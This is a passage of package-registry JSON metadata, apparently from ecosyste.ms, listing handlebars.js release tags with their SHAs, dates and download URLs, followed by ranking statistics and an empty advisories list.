dlebars.js/releases/tag/tmp-1252-backup","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@tmp-1252-backup","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/tmp-1252-backup","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/tmp-1252-backup/manifests"},{"name":"v4.0.6","sha":"ad3037cf54132fc5f589134d3bef961a5f751973","kind":"commit","published_at":"2016-11-12T18:32:45.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.6","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.6/manifests"},{"name":"v4.0.5","sha":"205c61cfb1acdb599bbdfcf2d356641254e09e5c","kind":"tag","published_at":"2015-11-20T05:06:54.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.5","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.5/manifests"},{"name":"v4.0.4","sha":"b7c95e9feb9b641af2fe83b23c3341ec624aae80","kind":"tag","published_at":"2015-10-29T06:54:17.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.4/manifests"},{"name":"v4.0.3","sha":"9365b8290070f34bf797c836aed4335ce6a4094f","kind":"tag","published_at":"2015-09-24T03:41:14.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.3/manifests"},{"name":"v4.0.2","sha":"a5a3ab01d3659b996234e3fa5a4a32350a145096","kind":"tag","published_at":"2015-09-04T14:13:16.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.2/manifests"},{"name":"v4.0.1","sha":"c7b28a65dab1f1bb370f258fd65796d74c7b53cb","kind":"tag","published_at":"2015-09-03T02:21:36.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"bff5fab8f9d42e21950be00dcf1cedf4dc1a565b","kind":"tag","published_at":"2015-09-01T13:19:14.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v4.0.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v4.0.0/manifests"},{"name":"v3.0.3","sha":"891f48b7e9c321dd9cbe7a898533eb6b2434b8a0","kind":"tag","published_at":"2015-04-28T19:52:04.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v3.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.3/manifests"},{"name":"v3.0.2","sha":"2f0b86665f6080c065d67182ccfdca2ce6f243fa","kind":"tag","published_at":"2015-04-20T08:11:12.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v3.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.2/manifests"},{"name":"v3.0.1","sha":"afe730e0594440dd17fdc43271fc4a7db19327f3","kind":"tag","published_at":"2015-03-24T19:22:38.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v3.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.1/manifests"},{"name":"v3.0.0","sha":"0099e16a01bae4789c3560e2a658fdd7fecc9e12","kind":"tag","published_at":"2015-02-10T06:14:55.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v3.0.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v3.0.0/manifests"},{"name":"v2.0.0","sha":"1eb2b04aa1468059172af16968e28ba3a9c07e6d","kind":"tag","published_at":"2014-09-02T02:28:59.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v2.0.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0/manifests"},{"name":"v2.0.0-beta.1","sha":"cee52ea68f85baf6812cbc6d303595a88b4ea4f8","kind":"tag","published_at":"2014-08-26T23:32:38.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v2.0.0-beta.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v2.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v2.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-beta.1/manifests"},{"name":"v2.0.0-alpha.4","sha":"efad61b1b72a487c087f57ba85287f5682e57280","kind":"tag","published_at":"2014-05-20T04:15:51.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v2.0.0-alpha.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v2.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v2.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.4/manifests"},{"name":"v2.0.0-alpha.3","sha":"f419838362ad6f3a6f10179bcd7ca683d527e030","kind":"tag","published_at":"2014-05-20T03:29:25.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v2.0.0-alpha.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v2.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v2.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.3/manifests"},{"name":"v2.0.0-alpha.2","sha":"04c312649b0b9c61a245c4928f230935e9b8dd23","kind":"tag","published_at":"2014-03-06T07:26:26.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v2.0.0-alpha.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v2.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v2.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.2/manifests"},{"name":"v2.0.0-alpha.1","sha":"a5ff1f3d22178b3889983be29b31b850a4528719","kind":"tag","published_at":"2014-02-19T23:49:09.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v2.0.0-alpha.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v2.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v2.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v2.0.0-alpha.1/manifests"},{"name":"v1.3.0","sha":"0c6829f8af189622afd726bb72c195b5323bd6f9","kind":"tag","published_at":"2014-01-02T04:10:31.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.3.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.3.0/manifests"},{"name":"v1.2.1","sha":"1c0614bd88b835b7cdfe1fb7f39650c18f645763","kind":"tag","published_at":"2013-12-26T22:25:42.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.2.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"096b8ccd2e376d621fd281e08d557a4632188aaa","kind":"tag","published_at":"2013-12-24T03:39:46.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.2.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.2.0/manifests"},{"name":"v1.1.2","sha":"47d13cb23c968ada3878b8bacf2813fb01758475","kind":"tag","published_at":"2013-11-06T00:10:06.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.1.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"09cdc19a21cd15059f1982f533bc65e2daae904d","kind":"tag","published_at":"2013-11-04T16:48:59.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.1.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"c53e95414f4e74bf6dfb2379a6b9b2468b8fcb31","kind":"tag","published_at":"2013-11-04T05:00:42.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.1.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.1.0/manifests"},{"name":"1.0.0","sha":"2a073e0993b40b81fbef82f681bb1dd171f2233b","kind":"tag","published_at":"2013-05-31T18:17:56.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/1.0.0","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0/manifests"},{"name":"v1.0.12","sha":"2a073e0993b40b81fbef82f681bb1dd171f2233b","kind":"tag","published_at":"2013-05-31T18:16:53.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.12","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.12/manifests"},{"name":"v1.0.11","sha":"4cf0410b7cc3e06f09b98bbc42a3d2df8e561eba","kind":"tag","published_at":"2013-05-14T04:09:21.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.11","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.11/manifests"},{"name":"1.0.0-rc.4","sha":"4cf0410b7cc3e06f09b98bbc42a3d2df8e561eba","kind":"commit","published_at":"2013-05-14T04:09:21.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/1.0.0-rc.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/1.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@1.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0-rc.4/manifests"},{"name":"v1.0.7","sha":"b5074a88ec17917309f5482de004076f3f676ad1","kind":"tag","published_at":"2013-05-10T04:51:50.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.7","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.7/manifests"},{"name":"v1.0.10","sha":"948231a31d7d6786f1ea0a293a378b20928f6f2b","kind":"tag","published_at":"2013-02-27T13:52:34.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.10","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.10/manifests"},{"name":"v1.0.9","sha":"b74711e63b7bab7971cb1267f7f0bd9a60b525d7","kind":"tag","published_at":"2013-02-16T01:43:52.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.9","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.9/manifests"},{"name":"1.0.0-rc.3","sha":"bc8214cb7cb4b04180f4df33439ac61a92e1123f","kind":"commit","published_at":"2013-02-15T05:58:20.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/1.0.0-rc.3","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/1.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@1.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0-rc.3/manifests"},{"name":"v1.0.8","sha":"5ac29dcb50cea15bee830304e391afd7375d56aa","kind":"tag","published_at":"2013-01-19T08:12:36.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.8","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.8/manifests"},{"name":"1.0.rc.2","sha":"9453c6d9d23f05c596123560ff9b5923e4eed954","kind":"commit","published_at":"2013-01-19T01:13:40.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/1.0.rc.2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/1.0.rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@1.0.rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.rc.2/manifests"},{"name":"1.0.rc.1","sha":"ce74c36118ffed1779889d97e6a2a1028ae61510","kind":"commit","published_at":"2012-09-16T04:11:36.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/1.0.rc.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/1.0.rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@1.0.rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.rc.1/manifests"},{"name":"v1.0.6-2","sha":"08e580a23be5abd74bdb757063bb783f4f240ea3","kind":"commit","published_at":"2012-07-31T16:50:55.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.6-2","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.6-2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.0.6-2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.6-2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.6-2/manifests"},{"name":"v1.0.6","sha":"f5289a35ecdbd35898fa6d291600ac9427930b44","kind":"commit","published_at":"2012-07-23T20:40:07.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.6","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.6/manifests"},{"name":"v1.0.6beta","sha":"fe7d16de9196718bbe716d684f2a1c349f24284b","kind":"commit","published_at":"2012-07-23T15:36:13.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.6beta","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.6beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.0.6beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.6beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.6beta/manifests"},{"name":"v1.0.5beta","sha":"bef909f5cbf855f38f58c727d07dbe8330d4c370","kind":"commit","published_at":"2012-02-09T17:06:11.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/v1.0.5beta","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/v1.0.5beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@v1.0.5beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.5beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/v1.0.5beta/manifests"},{"name":"1.0.0.beta.1","sha":"81071dd22c5295d796ab702d910e167029e178c4","kind":"commit","published_at":"2011-05-04T03:39:24.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/1.0.0.beta.1","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/1.0.0.beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@1.0.0.beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0.beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/1.0.0.beta.1/manifests"},{"name":"0.9.0.pre.4","sha":"d7f93c09e7031b28b27296b1e8f8e8bc801e56c9","kind":"tag","published_at":"2011-02-15T21:44:08.000Z","download_url":"https://codeload.github.com/handlebars-lang/handlebars.js/tar.gz/0.9.0.pre.4","html_url":"https://github.com/handlebars-lang/handlebars.js/releases/tag/0.9.0.pre.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/handlebars-lang/handlebars.js@0.9.0.pre.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/0.9.0.pre.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/handlebars-lang%2Fhandlebars.js/tags/0.9.0.pre.4/manifests"}]},"repo_metadata_updated_at":"2025-11-04T01:08:50.556Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":9.345852080216646,"dependent_packages_count":6.999148183520997,"stargazers_count":0.45194531764674195,"forks_count":0.4064926596763097,"average":4.300859560265174},"purl":"pkg:golang/github.com/handlebars-lang/handlebars.js","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/handlebars-lang/handlebars.js","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/handlebars-lang/handlebars.js","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/handlebars-lang/handlebars.js/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{